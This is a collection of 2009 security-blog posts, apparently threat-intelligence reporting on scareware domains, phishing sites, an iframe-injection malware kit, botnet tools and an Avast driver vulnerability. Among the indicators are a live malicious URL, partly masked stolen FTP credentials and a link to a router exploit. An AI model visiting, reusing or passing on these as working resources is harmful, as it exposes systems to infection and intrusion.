Location: hxxp://www.internetsecurity2.com/suites/ca_internet_security_webinstaller.exe
[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]

Threat Name: Suspicious.MH690
Location: hxxp://www.internetsecurity2.com/suites/registry_cure_webinstaller.exe
[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]

Small-whitebg-red Security Risks (what's this?)

Threats found: 1
Here is a complete list:
Threat Name: HTTP Malicious Toolkit Variant Activity
Location: hxxp://www.internetsecurity2.com/
[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]
[COPIED AND PASTED FROM ABOVE REPORT, JUST IN CASE THE ABOVE LINK FAILED]

DNS Graph:

DNS Records:

DNS Analysis Report:

Conclusion:
In conclusion, the site it is being hosted on "internetsecurity2", hosts many malicious malwares as listed above. Watch out for what you download, and never think that the HASH listing is only for the geeks. All the above data, were solely derived from the MD5 generated from the EXE.

Couldn't load the EXE into Anubis, as Anubis is having heavy delay for some reason. But yeah, if you have any further analysis that you wish to share with us, that would be awesome. Contact us at contact.fingers @ gmail. com if you have any queries or concerns.

- EF

A recent tour of scareware XVIII

2009-11-18T14:06:00.001-11:00

Virus Protector = AntiAID, SystemVeteran, BlockProtector, SystemWarrior
IP: 85.12.25.111, 83.233.30.66
Netherlands Eindhoven Web10 Ict Services
Sweden Stockholm Serverconnect I Norrland
Dominios asociados
antiaid.com
blockkeeper.com
blockprotector.com
systemveteran.com
Pope Green Defender
IP: 99.198.98.217
United States Chicago Singlehop Inc
Dominios asociados
popegreen.com

Spyware Defender 2009
IP: 99.198.98.218
United States Chicago Singlehop Inc
Dominios asociados
cheelumtech.com

Pro Defender 2008
IP: 99.198.98.202
United States Chicago Singlehop Inc
Dominios asociados
vlachosoft.com

Proof Defender
IP: 76.76.101.85
United States Portland Donald Wildes
Dominios asociados
proofdefender.com
proofdefender2009.com
www.pdefender2009.com
www.proofdefender.com

techno-rescue.com (209.8.45.117) Herndon Beyond The Network America
besttoolsdirect.com (193.169.234.3) Jamaica Titan-net Ltd
rfastnet.com/online (213.155.22.193) Ukraine Kiev Singhajeet3 - Singh Ajeet
advanced-virus-remover2010.com (91.207.116.55) Ukraine Czech Republic Of Rays
10-open-davinci.com
advanced-virus-remover2010.com
advanced-virusremover-2009.com
advanced-virusremover2009.com
advancedvirus-remover-2010.com
advancedvirusremover-2009.com
best-scan-pc.com
best-scan-pc.net
best-scan.com
best-scanpc.com
best-scanpc.net
best-scanpc.org
cathrynzfunz.com
coolcount1.com
downloadavr6.com
downloadavr7.com
downloadavr8.com
hard-xxx-tube.com
testavrdown.com
testavrdownnew.com
vsproject.net
www.advanced-virus-remover-2009.com
www.advancedvirus-remover2009.com
www.advancedvirusremover-2009.com
www.best-scan-pc.com
www.best-scanpc.net
www.best-scanpc.org
www.hard-xxx-tube.com
www.onlinescanxppro.com
xxx-white-tube.net
xxx-white-tube.org
argentmarketingtools.com (194.60.205.20) Russian Federation Baltic Center Of Innovations Techprominvest Ltd
thetoolsbargain.com, bestalltools.com (62.90.136.210) Israel Haifa Loads

Información relacionada
Una recorrida por los últimos scareware XVII
Una recorrida por los últimos scareware XV I
Una recorrida por los últimos scareware XV
Una recorrida por los últimos scareware XIV
Una recorrida por los últimos scareware XIII
Una recorrida por los últimos scareware XII
Una recorrida por los últimos scareware XI
Una recorrida por los últimos scareware X
Una recorrida por los últimos scareware IX
Una recorrida por los últimos scareware VIII
Una recorrida por los últimos scareware VII
Una recorrida por los últimos scareware VI
Una recorrida por los últimos scareware V
Una recorrida por los últimos scareware IV
Una recorrida por los últimos scareware III
Una recorrida por los últimos scareware II
Una recorrida por los últimos scareware I

Jorge Mieres
Pistus Malware Intelligence Blog

T-IFRAMER. Kit for the injection of malware In-the-Wild

2009-11-15T23:00:00.000-11:00

T-IFRAMER is a package that allows you to automate, centralize and manage via http the spread of malicious code via code injection sites violated viral techniques using iframe, and feed a botnet. We then see a screen capture of authentication.

While there is a complex kit allows computer criminals manage the spread of malware via the http protocol type attacks using Drive-by-Download and Drive-by-Injection by inserting iframe tags in web pages violated.

The four key modules: Stats, Manager, Iframes and Injector, and each has the main function to optimize the spread of malware.

The first one (Stats) to manage FTP accounts violated having control over them with the ability to upload files. Thus begins one of the cycles of propagation of malicious code.

The management module has several categories, among which are:

Iframe accounts. These are pages that have been injected malicious scripts through the iframe tag.
Not Iframe. FTP accounts are basically violated. In this case, stored until several ftp accounts:

ftp://distribs:softXP @ 193.xxx.xxx.66
ftp://distribs:softXP @ 193.xxx.xxx.66
ftp://tools:softXP @ 193.xxx.xxx.66
ftp://tools : softXP@193.xxx.xxx.66
ftp://tools:softXP @ 193.xxx.xxx.66
ftp://distribs:softXP @ 193.xxx.xxx.66
ftp://NST:124 @ 80. xxx.xxx.179
ftp://NST:124 @ 80.xxx.xxx.179
ftp://NST:124 @ 80.xxx.xxx.179
ftp://NST:124 @ 80.xxx.xxx.179

Good accounts. Allows you to set which violated ftp accounts are useful or are still active.
Freehosts accounts. It lists all the ftp violated websites that are hosted on free hosting.
Unchecked accounts. Accounts that haven't yet been reviewed.

The following screenshots show two of the ftp violated. In each of these can store any kind of information (warez, cracks, pornography, phishing, pedophile material, any type of malware). The first software houses and the second is a mirror to download * NIX based distributions.

Module Manager is itself a panel that allows the administration of each of the above categories, including the ability to directly remove the FTP record.

To this end, these first modules are concerned with everything related to the management of accounts. However, it doesn't end with these and the following modules are more aggressive.

One is the form Iframes. This allows you to set the strategy of attack through iframe tags, hiding it (as usual) in a script. In this case, the script has used as the url information http://flo4.cn/1.txt.

In turn, this url contains reference to another url, but in this case, contains a rough script that contains multiple exploits and malware automatically downloaded.

In this instance, after trying to run the exploit, it redirects the domain http://www.google.ru, which seems manipulates the return of the searches.

Exploits that have are the following:

CVE-2009-0927 (Adobe getIcon)
CVE-2008-2463 (Office Snapshot Viewer)
CVE-2008-2992 (Adobe util.printf overflow)
CVE-2008-0015 (MsVidCtl Overflow)
CVE-2007-5659 (Adobe Collab overflow)

Malicious code that are downloaded are:

ehkruz1.exe. This is a Trojan designed to capture information related to the service WebMoney and to date has a low rate of detection, antivirus detected only 6 engines of 41. The filename is random.
egiz.pdf. Contains exploit (CVE-2007-5659, CVE-2008-2992 and CVE-2009-0927) with a low detection rate, 7 / 41 (17.08%). Download the binary.
manual.swf. Contains exploit. Its detection rate is medium-low, 15/41 (36.59%).
sdfg.jar. Troyan is a downloader with exploit. Its detection rate is meda-low, 14/41 (34.15%).
ghknpxds.jpg. It contains an exploit. Its detection rate is very low, 4 / 41 (9.76%).

The module Injector is responsible for the actions iframe code injection through the module created earlier, letting you configure a number of parameters to optimize attack, for example, allows you to control PageRank, inject code, clean it if necessary, check the country's hosting and ftp accounts, establish which domains attack (1st and 2nd level, both configurable), configure regular expressions with the names of folders and files common to find in a web server, among others.

Investigating a little more domains involved, obvious that this application is being used as a tool of "support" for a known crimeware and of which we have spoken on this blog, this is the latest Fragus.

That is, the domain "hidden" between the labels iframe redirects to a new URL from which to exploit a battery of artillery trying to achieve with its potentially vulnerable computers, and download the malware responsible for recruiting the zombie.

T-IFRAMER has two distinct groups. On one hand the administration and on the other the attack in addition to obviously continue to fuel the botnet, with which it's clear that those behind this type of crimeware really know what they want and, although the development of the application is very simple, is effective enough to be used by a des botnets more effective today as it's fragus.

Finally, these actions are very similar to those performed by Gumblar (who according to some sources would be of Chinese origin, though I doubt it), and although I can not say that in this case concerned the mechanisms for disseminating Gumblar, especially because in the first instance this kit is of Russian origin (as fragus), there is no doubt that the strategy (together) is very similar.

Is it what many call today Gumble?

CCCure Group of Sites and EvilFingers Group of Sites - Technology Partners

2009-11-15T16:09:00.003-11:00

We are glad to announce that CCCURE group of websites and EvilFingers group of websites are official technology partners.

Snapshot of CCCure.org:

CCCure[pronounced as "Sea Secure"] is one of the largest training providers for various certifications. They do training & services. They are also one of the largest free testing website for CISSP and certain other certs.

Check it out at your convenience. Thanks to CCCure for extending their technology relations with EvilFingers group of sites.

Thank you for choosing our blog.
EF

ZeusTracker Project & EvilFingers Group of Sites - Technology Partners

2009-11-15T15:49:00.004-11:00

We are glad to announce the official technology partnership of ZeusTracker Project & EvilFingers Group of Sites. We have been researching in the same domain for a while and have shared data in the past through Malware Domains List. Since this was not officially declared until now, we thought that this is the right time to declare a Technology partnership.

Check this out: [ZeusTracker Project Site]

ZeusTracker project does the job of collecting and researching Zeus Botnet data, one of the largest Botnets in the history of mankind. ZeusTracker has done a great job in keeping their data up to date. It is quite hard to maintain records for fast-flux botnets, as they keep changing very frequently[highly volatile].

Thank you for choosing our blog.
EF

Do movie producers make their cut?

2009-11-15T14:58:00.007-11:00

There are many English and Foreign language sites that link to videos loaded into Google Videos, You Tube, Yahoo Videos and other places for accessing copy protected videos ripped from DVD or video print from movie theaters. Some of them include:

Do DVD protection software's really protect the movies from being ripped? Does RIAA really do its job in protecting such music and movies from being downloaded? Despite all such measures why do this still happen and how much loss do the movie makers face because of such illegal activities?

Well, the answer is too long & this blog was intended to put you to think. If you want to really watch a movie, buy the DVD or go to a theater. Don't support such illegal acts by even viewing these videos online. This would not stop the bad guys, but it would at the least discourage them from uploading illegal copies of the movies.

DRM Analytics coming soon[not too soon], with Digital Rights Management solutions to entertainment & gaming industry. Stay put!

Thank you for choosing our blog.
EF

Eve Online: How do big MMO's secure themselves?

2009-11-15T13:02:00.003-11:00

Eve Online is a cluster based MMO created primarily with Python.

The following statement is by Hilmar Veigar Petursson Chief Executive Officer of CCP games, on Python.org:

"Python enabled us to create EVE Online, a massive multiplayer game, in record time. The EVE Online server cluster runs over 50,000 simultaneous players in a shared space simulation, most of which is created in Python. The flexibilities of Python have enabled us to quickly improve the game experience based on player feedback" said Hilmar Veigar Petursson of CCP Games.

The following is a snapshot of the game:

We just added another snapshot because we thought that it looked nice :)

Python is known for its stability. Google utilizes Python for almost everything. That being the reason, the creator of Python is an employee @ Google.

What does it take to secure such MMO apps?

The main answer lies in the engines on which they are running. Python is known for its stability and highly structured with support to easy access/usage. Using Python does not mean that the software is secure, but that is just the first step towards "avoiding unstable development environment". The next thing is to ensure authenticity & authorization using access control techniques, integrity by using critificates, etc. But most of all MMO's main concern is to:

* Ensure that their model keeps changing, to avoid from someone cracking the software by applying Digital Rights Management solutions.
* Ensure that only authorized users get to access their tools.
* Prevent misuse by authorized users.
* Web application security - Prevent web based attacks.
* Load balance requests and have DoS/DDoS avoidances.

There are other things that MMO's do, to secure their apps. But these are the primary things I could think of. Beyond all this, Eve has done an awesome job and is the most popular MMO. Bravo Eve!

EF

Avast aswRdr.sys Kernel Pool Corruption and Local Privilege Escalation

2009-11-13T20:29:00.006-11:00

---------------------------------------------------
Advisory: Avast aswRdr.sys Kernel Pool Corruption and Local Privilege Escalation.

Version Affected: Product: Avast antivirus 4.8.1356.0 (other versions could be affected)
Vulnerable Compoonent: aswRdr.sys 4.8.1356.0 (avast! TDI RDR Driver)
Category: Local Denial of Service due to kernel memory corruption (BSOD)
(untested) Local Privilege Escalation

PoC Code: porting C++ 26/09/2009 Vendor Notify: 26/09/2009
Vendor Reply: 15/09/2009 Vendor Fix: 15/10/2009

Vulnerability Details:
Avast's aswRdr.sys Driver does not sanitize user supplied input IOCTL and this lead to Kernel Heap Overflow that propagates on the system with a BSOD and potential risk of Privilege Escalation.

Credit:
Giuseppe 'Evilcry' Bonfa' (Project Manager, www.EvilFingers.com)
E-Mail: evilcry {AT} GMAIL {DOT} COM
Additional credit: AbdulAziz Hariri from http://www.insight-tech.org
Website: http://evilcry.netsons.org, http://evilcodecave.blogspot.com
http://evilcodecave.wordpress.com

Disclaimer:
The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for a ny implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages.
---------------------------------------------------

FOR MORE INFO CLICK HERE.

- EF

Compendio mensual de información. Octubre 2009

2009-11-13T16:27:00.002-11:00

Pistus Malware Intelligence Blog
27.10.09 Una recorrida por los últimos scareware XVII
24.10.09 ZeuS Botnet y su poder de reclutamiento zombi
19.10.09 Pornografía. Excusa perfecta para la propagación de malware II
19.10.09 Malware Intelligence Linkedin Group
18.10.09 Panorama actual del negocio originado por crimeware
17.10.09 ZeuS, spam y certificados SSL
14.10.09 DDBot. Más gestión de botnets vía web
13.10.09 Una recorrida por los últimos scareware XVI
08.10.09 Nivel de (in)madurez en materia de prevención
04.10.09 Automatización en la creación de exploits
01.10.09 Rompiendo el esquema convencional de infección

Evil Fingers Blog
27.10.09 ZeuS and power Botnet zombie recruitment
18.10.09 Current business outlook caused by crimeware
17.10.09 A recent tour of scareware XVI
10.10.09 Level of (im)maturity in prevention
09.10.09 Automation in creating exploits
05.10.09 Breaking the conventional scheme of infection

ESET Latinoamérica Blog
31.10.09 Reporte de amenazas de octubre
28.10.09 Propagación de ZeuS a través de falsa actualización de Microsoft
26.10.09 Gira Seguridad Antivirus. Ahora, en Venezuela
21.10.09 Constructores de exploits. Más actividades for dummies
15.10.09 Nueva edición de nuestro Curso de Seguridad Antivirus
13.10.09 Nueva variante de Adware pide recompensa

Open Source Development Botnets. "My last words?

2009-11-13T16:19:00.001-11:00

Those who read the post about the project called crimeware Quad System, recall that between paragraphs said not knowing the cost of private version of this application for the control of botnets, for Windows platforms to GNU/Linux platforms.

The thing is ... for things of life itself ... the developer of these particular projects designed in Perl, called cross, was finished with his exploits reproaching himself with the closure of its website; expressing, through it, the motivations that led to his "violent" decision, and which show in the following screen:

However, after several days ~~(perhaps~~meditation), it was decided to return to your old tricks again making provision ~~for teaching~~ an array of applications for the control of botnets, or what is now synonymous, crimeware.

The new interface in their web is:

A curious fact, that like the rest of the post is unrelated technical aspects of information security is the introduction to the concept of "irony" that arises in the index is it ironic that feels its proposals in collaborative crime area?

Anyway, the guy still seems angry ... "with security professionals?... new interface as follows writes:

"... This site is dedicated to my projects and only my projects. Long time ago here you could find some more information, but currently, I do not give a shit about Providing any kind of information.

Besides, well, WTF? xD Something about me: I am the only one who is somehow keeping this site online and alive, taking care of it well, not much to take care of. What you can find here: some useless shit - my small projects. Well, I know no one gives a fuck, me neither - I place them here and here they are to stay, you like it or not. So, no fun in here: D

Fuck ... and who is that idiot found this fucked up god forsaken piece of shit? LULZ xD and LOL xD As you can see I keep my head up and travel through life with a smile on my face and damn bitching is not giving a fuck, man.

So you'll ask what a damn pepper should be of me, starting with such introduction? Well, I'm the man, say, cross is in the house babe xD Anyways, just fuck it. You got here my projects, I will put some new here too. Like once in a year. Some new papers Blah ... maybe if I will have some good mood for writing or I will be drunk as hell to believe in it. Hah ... Whatevah ... "

Despite that, this "subtle" character, apparently hardened Perl programmer, has some interesting things like a GUI for Nikto :-)

Related information
QuadNT System. Zombies Management System I (Windows)
Botnet Hybrid Control System. Http Development bot in perl
Open Source Development crimeware to manage botnets (...)
TRIAD Botnet III. Remote administration of multi zombies ...
TRIAD Botnet II. Remote administration of multi zombies ...
TRIAD Botnet. Remote administration of Linux zombies

Jorge Mieres
Pistus Malware Intelligence

Reverse engineering techniques to find security bugs: A...

2009-11-12T18:23:00.000-11:00

Google research discussion on Reverse engineering techniques to find security bugs:

- EF

Java Programming

2009-11-12T15:05:00.000-11:00

Reverse Engineering Course - InfoSec Institute

2009-11-11T17:26:00.002-11:00

When browsing through Reverse Engineering courses, I found the following course in the InfoSec Institute. Check it out! The following is copied and pasted from InfoSec Institute course page:

Reverse Engineering Training

Reverse Engineering: Malware, Binary Analysis and Software Vulnerabilities

Reverse engineering is a vitally important skill for today's expert security professional. Everything from reverse engineering malware to discovering vulnerabilities in binaries are required in order to properly secure an organization from today's ever evolving threats.

In this 5 day hands-on course, you will gain the necessary binary analysis skills to discover the true nature of any Windows binary. You will learn how to recognize the high level language constructs (such as branching statements, looping functions and network socket code) critical to performing a thorough and professional reverse engineering analysis of a binary. After learning these important introductory skills, you will advance to the analysis of:

* Hostile Code & Malware, including: Worms, Viruses, Trojans, Rootkits and Bots.
* Vulnerabilities in Binaries, including: Format string vulnerabilities, buffer overflow conditions, and the identification of flawed cryptographic schemes
* Binary obfuscation schemes, used by: Hackers, Trojan writers and copy protection algorithms

Additionally you will learn how to recognize the features modern optimizing compilers, including the gcc 4.x family of compilers and the ubiquitous Visual Studio .NET.

InfoSec Institute will train you on the standard reverse engineering programs IDA Pro, Ollydbg, and Softice. You will also learn how to use various hex editors, binary analysis programs, and code coverage analyzers.

Reverse Engineering is a critical skill.
Many incident response situations and computer forensics investigations cannot be completed accurately or thoroughly without understanding the runtime nature of a binary. Hackers increasingly use customized trojans that are not detected by antivirus which can only be analyzed and traced back to the original attacker via reverse engineering.

Additionally, many binary programs contain vulnerabilities, such as buffer overflows and the use of very weak cryptographic algorithms. The only way to discover these critical vulnerabilities for closed-source programs is to reverse engineer them.

Reverse engineering is also required in order to understand complex binary obfuscation schemes used by copy protection vendors, as well as obfuscation put in place by commercial software vendors.

Learn from Experts in the field of Reverse Engineering:
All of the instructors for InfoSec Institute's Reverse Engineering course active work in the field of incident response or security research. Our instructors have spoken at high-profile conferences (such as the Black Hat Briefings, the RSA Security Conference, and the Pentagon Security Forum) and industry events.

Learn reverse engineering in our hands-on classroom labs:
Some of the reverse engineering concepts you will learn to master during this course...

* Understanding conditional branching statements
* Virtual machines and bytecode
* System vs. Code Level reversing
* Identifying variables
* Compilers and branch prediction
* Memory management
* Win32 executable formats and image sections
* Fundamentals of IDA Pro
* Advanced uses of IDA Pro with hostile code
* Using Ollydbg for runtime analysis of malware
* Kernel mode debugging with SoftICE
* Dumping executables from memory with Dumpbin
* Locating undocumented APIs
* Reversing ntdll.dll
* Obfuscation of file formats

* Understanding hashing functions
* Working with encrypted binaries
* Reversing UPX and other compression types
* Discovering stack overflows
* Discovering heap overflows
* Creating a sandbox to isolate malware
* Unpacking malware
* Monitoring registry changes
* Identifying malware communication channels
* Understanding Digital Rights Management (DRM) implementations
* Thwarting anti-debugger code
* Debugging multi-threaded programs
* Recursive traversal dissasemblers
* Reversing .NET bytecode
* CREA Review
* Legal issues and the DMCA

Certified Reverse Engineering Analyst:
In any hands on reverse engineer training course, it is important to have the opportunity to prove to current or potential employers that you have the skills you say you do. This course prepares you for the top reverse engineering certification in the industry, the CREA. The exam is given on-site, InfoSec Institute has achieved a 93% pass rate for this certification.

How You Benefit:

* Gain the in-demand career skills of a reverse engineer. Very few information security professionals, incident response analysts and vulnerability researchers have the ability to reverse binaries efficiently. You will undoubtedly be at the top of your professional field.
* Learn the methodologies, tools, and manual reversing techniques used real world situations in our reversing lab.
* Move beyond automated "input and output" testing of binaries, commonly used by fuzzers and other analysis tools.
* More than interesting theories and lecture, get your hands dirty in our dedicated reversing lab in this security training course.

What's Included:

* 5 Days of Expert Reverse Engineering Instruction from a senior instructor with real-world experience and deep knowledge of course content.
* Guaranteed small class size (less than 10-16 Students), you get an intimate learning setting not offered at any of our competitors.
* InfoSec Institute's Custom Reversing Tools Enterprise Suite, includes every program covered in the course for at home study. (119 Tools).
* All meals, snacks and refreshments included.
* Certified Reverse Engineering Analyst (CREA) exam fees.
* Lecture, Lab Exercise and Text book

Required Prerequisites:

* Firm understanding of the Windows Operating System
* Firm understanding of computer architecture concepts
* Grasp of the TCP/IP protocols

If you are unsure if you meet the required prerequisites, contact us for a quick network security training skill check.

Thank you for checking out the stuff. Kindly, give your honest review in COMMENTS.

- EF

WatchGuard RootKits & Botnets Analysis

2009-11-11T16:53:00.003-11:00

Found couple of interesting Rootkit & Botnet videos offered by Watchguard at Youtube.

RootKits Analysis PART 1 (1/2)

RootKits Analysis PART 2

Botnet Source Code (1/2)

Botnet Source Code (2/2)

These videos are quite old, though it is still helpful for people who intend to learn more about this. Check it out!

- EF

Vyatta

2009-11-10T16:00:00.006-11:00

What is Vyatta?
It is an open source, linux based software that provides fire-walling, routing, VPN's and intrusion prevention; in addition, to load balancing and other features found on CISCO routers
http://www.vyatta.org/downloads

Why Vyatta?
Free and open source is always good.
The beauty is that one can have the functionality of a close to CISCO router, but the difference being that Vyatta is open source and based on linux, while most CISCO routers will cost you some dough.
There is also an option to install Vyatta if one is so inclined.
Furthermore, the nice thing about the Vyatta implementation is that it can be used in a network lab for certain pen-tests or setup up in a virtual environment.

I hope they will add an implementation that one could just use to flash their firmware as in DD-WRThttp://www.dd-wrt.com/site/index or Tomato http://www.polarcloud.com/tomato , however, for more security related tests and some functionality similar to CISCO routers this is a good way to go.For router service enumeration, fingerprinting videos, and some interesting stuff check out this
video:http://securitytube.net/Router-Hacking-Part-2-%28Service-Enumeration,-Fingerprinting-and-Default-Accounts%29-video.aspx

And if you have a DD-WRT, you might want to try some fun stuff with this:
http://security-sh3ll.blogspot.com/2009/07/exploiting-new-dd-wrt-remote-root-with.html

XILINX: Recorded E-Learning Course Listing

2009-11-08T11:47:00.002-11:00

Xilinx is a leading organization in programmable logic solutions. Their About Us says:

Xilinx is the worldwide leader in programmable logic solutions with over 51 percent market segment share in calendar year 2007, according to iSuppli. PLDs represent an exciting growth potential in the chip market thanks to their flexible nature and ability to change functionality even after being manufactured.

Xilinx programmable solutions fuel product innovation in diverse markets worldwide and are designed in a wide range of applications. Xilinx customers can change or upgrade product features and functions "on the fly" - adapting to new standards and reconfiguring the hardware for a specific application. This "on the fly" technology enables faster time-to-market, product differentiation and reduced cost.

Check out more on their main website, www.xilinx.com. They have pretty good set of videos on programmable gate arrays and other cool stuff. Check it out, when you can:

FPGA Design Courses

Basic FPGA Configuration - Part 1
Basic FPGA Configuration - Part 2
Basic FPGA Architecture: Architecture Wizard and PinAhead
Basic FPGA Architecture: Memory and Clocking Resources
Basic FPGA Architecture: Slice and I/O Resources
ChipScope™ Pro Software (with labs)
Spartan®-3E FPGA Architecture
Spartan-3 FPGA Architecture Overview
Area Constraints
Timing Closure Flow
Achieving Breakthrough Performance in Virtex-4 FPGAs
Clocking Techniques for Virtex-II FPGAs
SPI-4.2
IC Packaging
DDR-I SDRAM Memory Interface
FPGA and ASIC Technology Comparison module (Part 1) - Launch
FPGA and ASIC Technology Comparison module (Part 2) - Launch
FPGA vs. ASIC Design Flow (no lab) module - Launch
ASIC to FPGA Coding Conversion (includes lab) module (Part 1) - Launch
ASIC to FPGA Coding Conversion (includes lab) module (Part 2) - Launch
Power Estimation
Synthesis Options

Connectivity Design Courses

PCI Express®

DSP Design Courses

System Generator Getting Started
AccelDSP™ Jump Start Modules

CPLD Design Courses

CoolRunner™-II CPLD: Clocking and I/O

Languages

Basic HDL Coding Techniques - Part 1
Basic HDL Coding Techniques - Part 2
Spartan-3 FPGA HDL Coding Techniques - Part 1
Spartan-3 FPGA HDL Coding Techniques - Part 2
Virtex®-5 FPGA HDL Coding Techniques - Part 1
Virtex®-5 FPGA HDL Coding Techniques - Part 2
Virtex®-6 & Spartan®-6 FPGA HDL Coding Techniques - Part 1
Virtex®-6 & Spartan®-6 FPGA HDL Coding Techniques - Part 2

Thanks to Xilinx for sharing such great resources to the common world. This is something that is rare to find in FREE training videos.

- EF

Youtube videos on Windows Hang and Crash Dump Analysis

2009-11-07T18:28:00.004-11:00

Found these Youtube videos on Windows Hang and Crash Dump Analysis, and thought of sharing with you guys. So here it is[NOTE: To view the same directly on Youtube, click on the link directly above the video]:

Windows Hang and Crash Dump Analysis 1/9

Windows Hang and Crash Dump Analysis 2/9

Windows Hang and Crash Dump Analysis 3/9

Windows Hang and Crash Dump Analysis 4/9

Windows Hang and Crash Dump Analysis 5/9

Windows Hang and Crash Dump Analysis 6/9

Windows Hang and Crash Dump Analysis 7/9

Windows Hang and Crash Dump Analysis 8/9

Windows Hang and Crash Dump Analysis 9/9

I am not sure if this was helpful to everyone reading the blog. But I am darn sure that some of them are finding all the video postings helpful. Although, we aren't the creators of the videos, I am trying to find all the free and useful videos from the openly available resources we have to share with our viewers. If you are trying to find something, but unable to get the resource kindly send us an email to contact.fingers[at]gmail.com.

Thank you for your time.

- EF

QuadNT System. Zombies Management System I (Windows)

2009-11-05T01:56:00.001-11:00

From the hand of the author of the control systems and management of botnets Open Source (cross), a couple of months ago saw the light of another of his ambitious projects designed to control and manage botnets called Quad.

In this case, this is the version developed for the windows platform called QuadNT Remote Administrator, but there is also a version for operating systems based on *NIX platforms. As with his previous projects, this is primarily characterized by crimeware be developed in Perl. One aspect common to all these applications.

Unlike previous applications submitted by its developer, QuadNT Remote Administrator isn't free, ie has a free version with significant limitations and a private full version. However, unfortunately we can not know, maybe for the moment, the real cost of this crimeware, for reasons I will discuss shortly.

Among its features are highlighted the possibility of:

Connect Back Shell
Trash Flood
Mouse Logger
Keylogger
Proxy server
Encrypted Remote Terminal Emulator
Web Control Panel HTTP

As I said the same creator, remote management system for the control of botnets is based on three fundamental aspects:

A client-side console
A server-side Gateway
Automation of network botnet client that is in itself

This first version focuses its efforts QuadNT working in user mode (Ring3). However, cross, its author promises a second version but working at low level, just at the kernel level or what is the same, ring0.

Although previous projects are free, and although this same version will also offer free but limited version, still not in good acceptance in the underground world that makes the business of crimeware.

However, this does not mean that constitute threats, indeed are potential alternatives that show the development of applications for handling botnets can be addressed in programming languages not commonly used in the field of zombie networks.

Related information
Hybrid Botnet Control System. Desarrollo de http bot en perl
Desarrollo de crimeware Open Source para (...) administrar botnets
TRiAD Botnet III. Administración remota de zombis multi...
TRiAD Botnet II. Administración remota de zombis multi...
TRiAD Botnet. Administración remota de zombis en Linux

Jorge Mieres

PHP Academy: PHP Basic Tutorials

2009-11-04T16:52:00.003-11:00

When I was searching for PHP tutorials, I found the PHP Academy videos on PHP Basics. I thought that I should share it with you guys, since it would definitely help anyone who is looking for basic tuts to enter into PHP.

PHP Basics: Install a Webserver with PHP and MySQL (Windows)
PHP Basics: Echo Function
PHP Basics: Variables
PHP Basics: IF statement
PHP Basics: Arithmetic Operators
PHP Basics: Comparison Operators
PHP Basics: Logical Operators
PHP Basics: Switch
PHP Basics: Arrays
PHP Basics: Multi-dimentional Arrays
PHP Basics: Loops - While statement
PHP Basics: Loops - Do While statement
PHP Basics: Loops - For statement
PHP Basics: Loops - Foreach statement
PHP Basics: Basic function
PHP Basics: Advanced function
PHP Basics: GET variable
PHP Basics: POST variable
PHP Basics: Common Errors (Part 1)
PHP Basics: Common Errors (Part 2)
PHP Basics: Common Errors (Part 3)
PHP Basics: Embedding PHP inside HTML

End of basic tuts to PHP. Thanks to PHP Academy for their efforts.

EF

Phishing campaign targeted to users of MS

2009-11-04T01:01:00.002-11:00

Since they started to become popular websites that promise to provide contact information locked in the instant messaging client from Microsoft, the campaigns aimed at stealing users' private information, are in constant insistence.

The truth is that those who rely on this sort of cheating, they are victims no more or no less than a simple social engineering maneuver that in many cases, has a relatively unpalatable effectiveness and intended to carry out phishing attacks.

This situation makes complete evidence levels (im) maturity that still exists in prevention and the need to raise awareness about the true scope and safety implications of the concepts of confidentiality and privacy.

In this sense, a new phishing campaign is seeking to capture the attention of users who use popular instant messaging client from Microsoft, MSN. That is, almost 90% of people.

Behind a hedge under the slogan "Verify who blocked you on their msn contact list", a campaign that lies strategically and with patience is getting usernames and their passwords for all those interested in finding out who of your contacts have blocked ... I still don't understand it :(

From a technical standpoint, under the IP address 121.54.174.85 (Hong Kong Hong Kong Sun Network Limited) are housed a significant number of domains that redirect to the same fraudulent. These domains are:

ahem-they-blocked-me.com
cindrella-blocked-me.com
damnn-they-blocked-me.com
did-they-block-you.com
face-blocked-truth.com
find-reason-of-being-blocked.com
finding-who-blocks.com
friends-block-buddies.com
grab-block-status.com
grab-my-block-status.com
have-they-blocked-you.com
heroes-never-block.com
how-come-they-block-me.com
im-fedup-of-being-blocked.com
im-sad-im-blocked.com
ima-checking-block-status.com
jesus-he-blocked-us.com
kephsa.why-do-they-block.com
lame-friends-block-you.com
leme-check-block-status.com
mean-friends-block.com
mjzfx0.why-do-they-block.com
notice-they-blocked-u.com
oh-i-was-blocked.com
omg-they-blocked-me.com
phew-they-blocked-me.com
phewww-seems-i-am-blocked.com
puff-im-blocked.com
pwdgds.grab-my-block-status.com
sad-i-was-blocked.com
see-they-blocked-me.com
tchv9l.find-reason-of-being-blocked.com
they-were-haha.com
ufff-i-was-blocked.com
urr-he-blocked-us.com
weird-i-was-blocked.com
who-let-me-block.com
why-do-they-block.com
why-my-friends-block.com
wooh-im-blocked.com

It's extremely important to take precautionary and preventive measures necessary to avoid being victims of such techniques, extremely simple to implement and extremely effective for those who aren't aware of them.

In this case, it isn't implementing a security solution at full speed but common sense. To access information on the website only legitimate and verify the existence of security measures that ensure the encryption of data.

Above all, don't ask him how to get lots of information on different authentication credentials for web services and publish them on the Internet without restriction :)

Related information
Nivel de (in)madurez en materia de prevención
Phishing Kit. Creador automático de sitios fraudulentos
Phishing Kit In-the-Wild para clonación de sitios web, versión 2
Phishing Kit In-the-Wild para clonación de sitios web
Estado de la seguridad según Microsoft
Phishing y "cuentos" en navidad
Phishing para American Express y consejos

Jorge Mieres

RogueSoftware: Rogueware listing

2009-11-03T06:12:00.006-11:00

Rogueware listing or RogueSoftware listing is a free initiative of Sunbelt Software to share their valuable information to the open world.

Since we found their blog interesting too, we have started listing them in our blog roll with their RSS feeds.

How can this help you? - Reading their blog and twitter would keep you updated on current rogueware infecting others, out there.

Click here for reading more on RogueSoftare Twitter.

Click here for viewing their blog.

NOTE: This is ***NOT*** an advertisement. We just want to thank every open initiative for helping Security community.

- EF

Free tool to control other PC's on network

2009-11-03T03:51:00.002-11:00

If you just want a free tool that gets the job done in terms of controlling PC's cheaply or viewing what's happening on another PC, you can use iTALC, it's free and last time I checked support was for Windows and Linux

Nice thing is you can use this on your network if you are so inclined or if you just want to test it out.

http://italc.sourceforge.net/home.php

Eye Protection

2009-11-03T03:46:00.002-11:00

